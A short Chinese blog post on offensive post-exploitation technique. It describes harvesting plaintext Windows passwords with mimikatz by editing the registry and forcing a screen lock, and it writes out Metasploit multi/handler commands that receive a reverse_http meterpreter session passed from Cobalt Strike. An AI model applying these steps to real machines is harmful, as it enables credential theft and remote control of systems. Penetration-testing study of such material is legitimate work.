cs与msf权限传递,以及mimikatz抓取win2012明文密码

一、mimikatz抓取windows明文密码
我这里用的是window2016测试

假设我已经获取到了一台windows的权限

抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
 

cs->msf

创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行新建会话选择监听器

 msf进去选择监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)
set lhost 0.0.0.0(不设置也行)
set lport 4444
exploit
 

  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值